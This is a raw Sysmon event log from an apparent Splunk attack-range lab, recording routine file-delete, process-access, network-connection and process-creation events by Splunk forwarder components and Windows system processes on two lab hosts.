Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.333{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E45F00AC9685AD843B6CEDD1439A89C,SHA256=AC8519809244633F6D389BEE2F8AA7B9A0878E557627F3A5E8712A215A05470D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.813{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51541-false10.0.1.12-8089- 10341000x8000000000000000219829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1585-6216-D404-000000003902}1152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1585-6216-D404-000000003902}1152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.254{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1585-6216-D404-000000003902}1152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.255{4F8D34B0-1585-6216-D404-000000003902}1152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:50.767{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAF37192898BBED1681D1D83D7955BF0,SHA256=AEB03FC350C1E1C7EAF788F5B14BFE33BCDEE0A008C6F12CE859C268C2A64F4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:50.395{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C8EB010C7259CC949012C58FD51BF67,SHA256=41E61572F0EDCDA3651DC3C1EEE5CF7C6FB4B1CCDC2516FE46E4D2C7F5BD1373,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:50.333{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=797113CB8A81506645AC453005323597,SHA256=1081F88B26EAEC74BAA98CA0DF1D7966F68D0428595FC524C606D52F0B4F1D8D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:50.161{4F8D34B0-1585-6216-D504-000000003902}27123008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:51.799{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57598FCA408D2D36ED5760B748891FC1,SHA256=ED3A01DBF370E33C84978933646657B7F758F45E70C4729389B835792E45BE57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.442{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81F0CF351382E82FB0AB0550C4133BBA,SHA256=C53ABC87127E5D923AC8F292C440185287D94B9384945242A21221C32C9AC6A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.486{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51542-false10.0.1.12-8000- 354300x8000000000000000219862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:48.256{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx51764-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000219861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1587-6216-D604-000000003902}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 